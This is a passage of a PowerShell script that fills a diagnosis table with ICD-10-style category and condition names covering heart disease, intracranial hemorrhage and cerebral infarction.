$DiagnosisList.Rows.Add("Other diseases of pericardium","Hemopericardium, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other diseases of pericardium","Pericardial effusion (noninflammatory)") + $null = $DiagnosisList.Rows.Add("Other diseases of pericardium","Cardiac tamponade") + $null = $DiagnosisList.Rows.Add("Other diseases of pericardium","Other specified diseases of pericardium") + $null = $DiagnosisList.Rows.Add("Other diseases of pericardium","Disease of pericardium, unspecified") + $null = $DiagnosisList.Rows.Add("Pericarditis in diseases classified elsewhere","Pericarditis in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Acute and subacute endocarditis","Acute and subacute infective endocarditis") + $null = $DiagnosisList.Rows.Add("Acute and subacute endocarditis","Acute and subacute endocarditis, unspecified") + $null = $DiagnosisList.Rows.Add("Nonrheumatic mitral valve disorders","Nonrheumatic mitral (valve) insufficiency") + $null = $DiagnosisList.Rows.Add("Nonrheumatic mitral valve disorders","Nonrheumatic mitral (valve) prolapse") + $null = $DiagnosisList.Rows.Add("Nonrheumatic mitral valve disorders","Nonrheumatic mitral (valve) stenosis") + $null = $DiagnosisList.Rows.Add("Nonrheumatic mitral valve disorders","Other nonrheumatic mitral valve disorders") + $null = $DiagnosisList.Rows.Add("Nonrheumatic mitral valve disorders","Nonrheumatic mitral valve disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Nonrheumatic aortic valve disorders","Nonrheumatic aortic (valve) stenosis") + $null = $DiagnosisList.Rows.Add("Nonrheumatic aortic valve disorders","Nonrheumatic aortic (valve) insufficiency") + $null = $DiagnosisList.Rows.Add("Nonrheumatic aortic valve disorders","Nonrheumatic aortic (valve) stenosis with insufficiency") + $null = $DiagnosisList.Rows.Add("Nonrheumatic aortic valve disorders","Other nonrheumatic aortic valve disorders") + $null = $DiagnosisList.Rows.Add("Nonrheumatic aortic valve disorders","Nonrheumatic aortic valve disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Nonrheumatic tricuspid valve disorders","Nonrheumatic tricuspid (valve) stenosis") + $null = $DiagnosisList.Rows.Add("Nonrheumatic tricuspid valve disorders","Nonrheumatic tricuspid (valve) insufficiency") + $null = $DiagnosisList.Rows.Add("Nonrheumatic tricuspid valve disorders","Nonrheumatic tricuspid (valve) stenosis with insufficiency") + $null = $DiagnosisList.Rows.Add("Nonrheumatic tricuspid valve disorders","Other nonrheumatic tricuspid valve disorders") + $null = $DiagnosisList.Rows.Add("Nonrheumatic tricuspid valve disorders","Nonrheumatic tricuspid valve disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Nonrheumatic pulmonary valve disorders","Nonrheumatic pulmonary valve stenosis") + $null = $DiagnosisList.Rows.Add("Nonrheumatic pulmonary valve disorders","Nonrheumatic pulmonary valve insufficiency") + $null = $DiagnosisList.Rows.Add("Nonrheumatic pulmonary valve disorders","Nonrheumatic pulmonary valve stenosis with insufficiency") + $null = $DiagnosisList.Rows.Add("Nonrheumatic pulmonary valve disorders","Other nonrheumatic pulmonary valve disorders") + $null = $DiagnosisList.Rows.Add("Nonrheumatic pulmonary valve disorders","Nonrheumatic pulmonary valve disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Endocarditis, valve unspecified","Endocarditis, valve unspecified") + $null = $DiagnosisList.Rows.Add("Endocarditis and heart valve disorders in diseases classified elsewhere","Endocarditis and heart valve disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Acute myocarditis","Infective myocarditis") + $null = $DiagnosisList.Rows.Add("Acute myocarditis","Isolated myocarditis") + $null = $DiagnosisList.Rows.Add("Acute myocarditis","Other acute myocarditis") + $null = $DiagnosisList.Rows.Add("Acute myocarditis","Acute myocarditis, unspecified") + $null = $DiagnosisList.Rows.Add("Myocarditis in diseases classified elsewhere","Myocarditis in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Dilated cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Obstructive hypertrophic cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Other hypertrophic cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Endomyocardial (eosinophilic) disease") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Endocardial fibroelastosis") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Other restrictive cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Alcoholic cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Cardiomyopathy due to drug and external agent") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Other cardiomyopathies") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy","Cardiomyopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Cardiomyopathy in diseases classified elsewhere","Cardiomyopathy in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Atrioventricular and left bundle-branch block","Atrioventricular block, first degree") + $null = $DiagnosisList.Rows.Add("Atrioventricular and left bundle-branch block","Atrioventricular block, second degree") + $null = $DiagnosisList.Rows.Add("Atrioventricular and left bundle-branch block","Atrioventricular block, complete") + $null = $DiagnosisList.Rows.Add("Other and unspecified atrioventricular block","Unspecified atrioventricular block") + $null = $DiagnosisList.Rows.Add("Other and unspecified atrioventricular block","Other atrioventricular block") + $null = $DiagnosisList.Rows.Add("Left anterior fascicular block","Left anterior fascicular block") + $null = $DiagnosisList.Rows.Add("Left posterior fascicular block","Left posterior fascicular block") + $null = $DiagnosisList.Rows.Add("Other and unspecified fascicular block","Unspecified fascicular block") + $null = $DiagnosisList.Rows.Add("Other and unspecified fascicular block","Other fascicular block") + $null = $DiagnosisList.Rows.Add("Left bundle-branch block, unspecified","Left bundle-branch block, unspecified") + $null = $DiagnosisList.Rows.Add("Other conduction disorders","Right fascicular block") + $null = $DiagnosisList.Rows.Add("Other and unspecified right bundle-branch block","Unspecified right bundle-branch block") + $null = $DiagnosisList.Rows.Add("Other and unspecified right bundle-branch block","Other right bundle-branch block") + $null = $DiagnosisList.Rows.Add("Bifascicular block","Bifascicular block") + $null = $DiagnosisList.Rows.Add("Trifascicular block","Trifascicular block") + $null = $DiagnosisList.Rows.Add("Nonspecific intraventricular block","Nonspecific intraventricular block") + $null = $DiagnosisList.Rows.Add("Other specified heart block","Other specified heart block") + $null = $DiagnosisList.Rows.Add("Pre-excitation syndrome","Pre-excitation syndrome") + $null = $DiagnosisList.Rows.Add("Other specified conduction disorders","Long QT syndrome") + $null = $DiagnosisList.Rows.Add("Other specified conduction disorders","Other specified conduction disorders") + $null = $DiagnosisList.Rows.Add("Conduction disorder, unspecified","Conduction disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cardiac arrest","Cardiac arrest due to underlying cardiac condition") + $null = $DiagnosisList.Rows.Add("Cardiac arrest","Cardiac arrest due to other underlying condition") + $null = $DiagnosisList.Rows.Add("Cardiac arrest","Cardiac arrest, cause unspecified") + $null = $DiagnosisList.Rows.Add("Paroxysmal tachycardia","Re-entry ventricular arrhythmia") + $null = $DiagnosisList.Rows.Add("Paroxysmal tachycardia","Supraventricular tachycardia") + $null = $DiagnosisList.Rows.Add("Paroxysmal tachycardia","Ventricular tachycardia") + $null = $DiagnosisList.Rows.Add("Paroxysmal tachycardia","Paroxysmal tachycardia, unspecified") + $null = $DiagnosisList.Rows.Add("Atrial fibrillation and flutter","Paroxysmal atrial fibrillation") + $null = $DiagnosisList.Rows.Add("Atrial fibrillation and flutter","Persistent atrial fibrillation") + $null = $DiagnosisList.Rows.Add("Atrial fibrillation and flutter","Chronic atrial fibrillation") + $null = $DiagnosisList.Rows.Add("Atrial fibrillation and flutter","Typical atrial flutter") + $null = $DiagnosisList.Rows.Add("Atrial fibrillation and flutter","Atypical atrial flutter") + $null = $DiagnosisList.Rows.Add("Unspecified atrial fibrillation and atrial flutter","Unspecified atrial fibrillation") + $null = $DiagnosisList.Rows.Add("Unspecified atrial fibrillation and atrial flutter","Unspecified atrial flutter") + $null = $DiagnosisList.Rows.Add("Ventricular fibrillation and flutter","Ventricular fibrillation") + $null = $DiagnosisList.Rows.Add("Ventricular fibrillation and flutter","Ventricular flutter") + $null = $DiagnosisList.Rows.Add("Atrial premature depolarization","Atrial premature depolarization") + $null = $DiagnosisList.Rows.Add("Junctional premature depolarization","Junctional premature depolarization") + $null = $DiagnosisList.Rows.Add("Ventricular premature depolarization","Ventricular premature depolarization") + $null = $DiagnosisList.Rows.Add("Other and unspecified premature depolarization","Unspecified premature depolarization") + $null = $DiagnosisList.Rows.Add("Other and unspecified premature depolarization","Other premature depolarization") + $null = $DiagnosisList.Rows.Add("Sick sinus syndrome","Sick sinus syndrome") + $null = $DiagnosisList.Rows.Add("Other specified cardiac arrhythmias","Other specified cardiac arrhythmias") + $null = $DiagnosisList.Rows.Add("Cardiac arrhythmia, unspecified","Cardiac arrhythmia, unspecified") + $null = $DiagnosisList.Rows.Add("Heart failure","Left ventricular failure, unspecified") + $null = $DiagnosisList.Rows.Add("Systolic (congestive) heart failure","Unspecified systolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Systolic (congestive) heart failure","Acute systolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Systolic (congestive) heart failure","Chronic systolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Systolic (congestive) heart failure","Acute on chronic systolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Diastolic (congestive) heart failure","Unspecified diastolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Diastolic (congestive) heart failure","Acute diastolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Diastolic (congestive) heart failure","Chronic diastolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Diastolic (congestive) heart failure","Acute on chronic diastolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Combined systolic (congestive) and diastolic (congestive) heart failure","Unspecified combined systolic (congestive) and diastolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Combined systolic (congestive) and diastolic (congestive) heart failure","Acute combined systolic (congestive) and diastolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Combined systolic (congestive) and diastolic (congestive) heart failure","Chronic combined systolic (congestive) and diastolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Combined systolic (congestive) and diastolic (congestive) heart failure","Acute on chronic combined systolic (congestive) and diastolic (congestive) heart failure") + $null = $DiagnosisList.Rows.Add("Right heart failure","Right heart failure, unspecified") + $null = $DiagnosisList.Rows.Add("Right heart failure","Acute right heart failure") + $null = $DiagnosisList.Rows.Add("Right heart failure","Chronic right heart failure") + $null = $DiagnosisList.Rows.Add("Right heart failure","Acute on chronic right heart failure") + $null = $DiagnosisList.Rows.Add("Right heart failure","Right heart failure due to left heart failure") + $null = $DiagnosisList.Rows.Add("Biventricular heart failure","Biventricular heart failure") + $null = $DiagnosisList.Rows.Add("High output heart failure","High output heart failure") + $null = $DiagnosisList.Rows.Add("End stage heart failure","End stage heart failure") + $null = $DiagnosisList.Rows.Add("Other heart failure","Other heart failure") + $null = $DiagnosisList.Rows.Add("Heart failure, unspecified","Heart failure, unspecified") + $null = $DiagnosisList.Rows.Add("Complications and ill-defined descriptions of heart disease","Cardiac septal defect, acquired") + $null = $DiagnosisList.Rows.Add("Complications and ill-defined descriptions of heart disease","Rupture of chordae tendineae, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Complications and ill-defined descriptions of heart disease","Rupture of papillary muscle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Complications and ill-defined descriptions of heart disease","Intracardiac thrombosis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Complications and ill-defined descriptions of heart disease","Myocarditis, unspecified") + $null = $DiagnosisList.Rows.Add("Complications and ill-defined descriptions of heart disease","Myocardial degeneration") + $null = $DiagnosisList.Rows.Add("Complications and ill-defined descriptions of heart disease","Cardiomegaly") + $null = $DiagnosisList.Rows.Add("Other ill-defined heart diseases","Takotsubo syndrome") + $null = $DiagnosisList.Rows.Add("Other ill-defined heart diseases","Other ill-defined heart diseases") + $null = $DiagnosisList.Rows.Add("Heart disease, unspecified","Heart disease, unspecified") + $null = $DiagnosisList.Rows.Add("Other heart disorders in diseases classified elsewhere","Other heart disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from carotid siphon and bifurcation","Nontraumatic subarachnoid hemorrhage from unspecified carotid siphon and bifurcation") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from carotid siphon and bifurcation","Nontraumatic subarachnoid hemorrhage from right carotid siphon and bifurcation") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from carotid siphon and bifurcation","Nontraumatic subarachnoid hemorrhage from left carotid siphon and bifurcation") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from middle cerebral artery","Nontraumatic subarachnoid hemorrhage from unspecified middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from middle cerebral artery","Nontraumatic subarachnoid hemorrhage from right middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from middle cerebral artery","Nontraumatic subarachnoid hemorrhage from left middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from anterior communicating artery","Nontraumatic subarachnoid hemorrhage from anterior communicating artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from posterior communicating artery","Nontraumatic subarachnoid hemorrhage from unspecified posterior communicating artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from posterior communicating artery","Nontraumatic subarachnoid hemorrhage from right posterior communicating artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from posterior communicating artery","Nontraumatic subarachnoid hemorrhage from left posterior communicating artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from basilar artery","Nontraumatic subarachnoid hemorrhage from basilar artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from vertebral artery","Nontraumatic subarachnoid hemorrhage from unspecified vertebral artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from vertebral artery","Nontraumatic subarachnoid hemorrhage from right vertebral artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from vertebral artery","Nontraumatic subarachnoid hemorrhage from left vertebral artery") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from other intracranial arteries","Nontraumatic subarachnoid hemorrhage from other intracranial arteries") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage from unspecified intracranial artery","Nontraumatic subarachnoid hemorrhage from unspecified intracranial artery") + $null = $DiagnosisList.Rows.Add("Other nontraumatic subarachnoid hemorrhage","Other nontraumatic subarachnoid hemorrhage") + $null = $DiagnosisList.Rows.Add("Nontraumatic subarachnoid hemorrhage, unspecified","Nontraumatic subarachnoid hemorrhage, unspecified") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Nontraumatic intracerebral hemorrhage in hemisphere, subcortical") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Nontraumatic intracerebral hemorrhage in hemisphere, cortical") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Nontraumatic intracerebral hemorrhage in hemisphere, unspecified") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Nontraumatic intracerebral hemorrhage in brain stem") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Nontraumatic intracerebral hemorrhage in cerebellum") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Nontraumatic intracerebral hemorrhage, intraventricular") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Nontraumatic intracerebral hemorrhage, multiple localized") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Other nontraumatic intracerebral hemorrhage") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracerebral hemorrhage","Nontraumatic intracerebral hemorrhage, unspecified") + $null = $DiagnosisList.Rows.Add("Nontraumatic subdural hemorrhage","Nontraumatic subdural hemorrhage, unspecified") + $null = $DiagnosisList.Rows.Add("Nontraumatic subdural hemorrhage","Nontraumatic acute subdural hemorrhage") + $null = $DiagnosisList.Rows.Add("Nontraumatic subdural hemorrhage","Nontraumatic subacute subdural hemorrhage") + $null = $DiagnosisList.Rows.Add("Nontraumatic subdural hemorrhage","Nontraumatic chronic subdural hemorrhage") + $null = $DiagnosisList.Rows.Add("Nontraumatic extradural hemorrhage","Nontraumatic extradural hemorrhage") + $null = $DiagnosisList.Rows.Add("Nontraumatic intracranial hemorrhage, unspecified","Nontraumatic intracranial hemorrhage, unspecified") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of precerebral arteries","Cerebral infarction due to thrombosis of unspecified precerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of vertebral artery","Cerebral infarction due to thrombosis of right vertebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of vertebral artery","Cerebral infarction due to thrombosis of left vertebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of vertebral artery","Cerebral infarction due to thrombosis of bilateral vertebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of vertebral artery","Cerebral infarction due to thrombosis of unspecified vertebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of basilar artery","Cerebral infarction due to thrombosis of basilar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of carotid artery","Cerebral infarction due to thrombosis of right carotid artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of carotid artery","Cerebral infarction due to thrombosis of left carotid artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of carotid artery","Cerebral infarction due to thrombosis of bilateral carotid arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of carotid artery","Cerebral infarction due to thrombosis of unspecified carotid artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of other precerebral artery","Cerebral infarction due to thrombosis of other precerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of precerebral arteries","Cerebral infarction due to embolism of unspecified precerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of vertebral artery","Cerebral infarction due to embolism of right vertebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of vertebral artery","Cerebral infarction due to embolism of left vertebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of vertebral artery","Cerebral infarction due to embolism of bilateral vertebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of vertebral artery","Cerebral infarction due to embolism of unspecified vertebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of basilar artery","Cerebral infarction due to embolism of basilar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of carotid artery","Cerebral infarction due to embolism of right carotid artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of carotid artery","Cerebral infarction due to embolism of left carotid artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of carotid artery","Cerebral infarction due to embolism of bilateral carotid arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of carotid artery","Cerebral infarction due to embolism of unspecified carotid artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of other precerebral artery","Cerebral infarction due to embolism of other precerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of precerebral arteries","Cerebral infarction due to unspecified occlusion or stenosis of unspecified precerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of vertebral arteries","Cerebral infarction due to unspecified occlusion or stenosis of right vertebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of vertebral arteries","Cerebral infarction due to unspecified occlusion or stenosis of left vertebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of vertebral arteries","Cerebral infarction due to unspecified occlusion or stenosis of bilateral vertebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of vertebral arteries","Cerebral infarction due to unspecified occlusion or stenosis of unspecified vertebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of basilar artery","Cerebral infarction due to unspecified occlusion or stenosis of basilar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of carotid arteries","Cerebral infarction due to unspecified occlusion or stenosis of right carotid arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of carotid arteries","Cerebral infarction due to unspecified occlusion or stenosis of left carotid arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of carotid arteries","Cerebral infarction due to unspecified occlusion or stenosis of bilateral carotid arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of carotid arteries","Cerebral infarction due to unspecified occlusion or stenosis of unspecified carotid arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of other precerebral arteries","Cerebral infarction due to unspecified occlusion or stenosis of other precerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of cerebral arteries","Cerebral infarction due to thrombosis of unspecified cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of middle cerebral artery","Cerebral infarction due to thrombosis of right middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of middle cerebral artery","Cerebral infarction due to thrombosis of left middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of middle cerebral artery","Cerebral infarction due to thrombosis of bilateral middle cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of middle cerebral artery","Cerebral infarction due to thrombosis of unspecified middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of anterior cerebral artery","Cerebral infarction due to thrombosis of right anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of anterior cerebral artery","Cerebral infarction due to thrombosis of left anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of anterior cerebral artery","Cerebral infarction due to thrombosis of bilateral anterior cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of anterior cerebral artery","Cerebral infarction due to thrombosis of unspecified anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of posterior cerebral artery","Cerebral infarction due to thrombosis of right posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of posterior cerebral artery","Cerebral infarction due to thrombosis of left posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of posterior cerebral artery","Cerebral infarction to thrombosis of bilateral posterior cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of posterior cerebral artery","Cerebral infarction due to thrombosis of unspecified posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of cerebellar artery","Cerebral infarction due to thrombosis of right cerebellar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of cerebellar artery","Cerebral infarction due to thrombosis of left cerebellar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of cerebellar artery","Cerebral infarction to thrombosis of bilateral cerebellar arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of cerebellar artery","Cerebral infarction due to thrombosis of unspecified cerebellar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to thrombosis of other cerebral artery","Cerebral infarction due to thrombosis of other cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of cerebral arteries","Cerebral infarction due to embolism of unspecified cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of middle cerebral artery","Cerebral infarction due to embolism of right middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of middle cerebral artery","Cerebral infarction due to embolism of left middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of middle cerebral artery","Cerebral infarction due to embolism of bilateral middle cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of middle cerebral artery","Cerebral infarction due to embolism of unspecified middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of anterior cerebral artery","Cerebral infarction due to embolism of right anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of anterior cerebral artery","Cerebral infarction due to embolism of left anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of anterior cerebral artery","Cerebral infarction due to embolism of bilateral anterior cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of anterior cerebral artery","Cerebral infarction due to embolism of unspecified anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of posterior cerebral artery","Cerebral infarction due to embolism of right posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of posterior cerebral artery","Cerebral infarction due to embolism of left posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of posterior cerebral artery","Cerebral infarction due to embolism of bilateral posterior cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of posterior cerebral artery","Cerebral infarction due to embolism of unspecified posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of cerebellar artery","Cerebral infarction due to embolism of right cerebellar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of cerebellar artery","Cerebral infarction due to embolism of left cerebellar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of cerebellar artery","Cerebral infarction due to embolism of bilateral cerebellar arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of cerebellar artery","Cerebral infarction due to embolism of unspecified cerebellar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to embolism of other cerebral artery","Cerebral infarction due to embolism of other cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of cerebral arteries","Cerebral infarction due to unspecified occlusion or stenosis of unspecified cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of middle cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of right middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of middle cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of left middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of middle cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of bilateral middle cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of middle cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of unspecified middle cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of anterior cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of right anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of anterior cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of left anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of anterior cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of bilateral anterior cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of anterior cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of unspecified anterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of posterior cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of right posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of posterior cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of left posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of posterior cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of bilateral posterior cerebral arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of posterior cerebral artery","Cerebral infarction due to unspecified occlusion or stenosis of unspecified posterior cerebral artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of cerebellar artery","Cerebral infarction due to unspecified occlusion or stenosis of right cerebellar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of cerebellar artery","Cerebral infarction due to unspecified occlusion or stenosis of left cerebellar artery") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of cerebellar artery","Cerebral infarction due to unspecified occlusion or stenosis of bilateral cerebellar arteries") + $null = $DiagnosisList.Rows.Add("Cerebral infarction due to unspecified occlusion or stenosis of cerebellar artery","Cerebral infarction due to unspecified occlusion or stenosis of unspecified cerebellar artery") + $null = 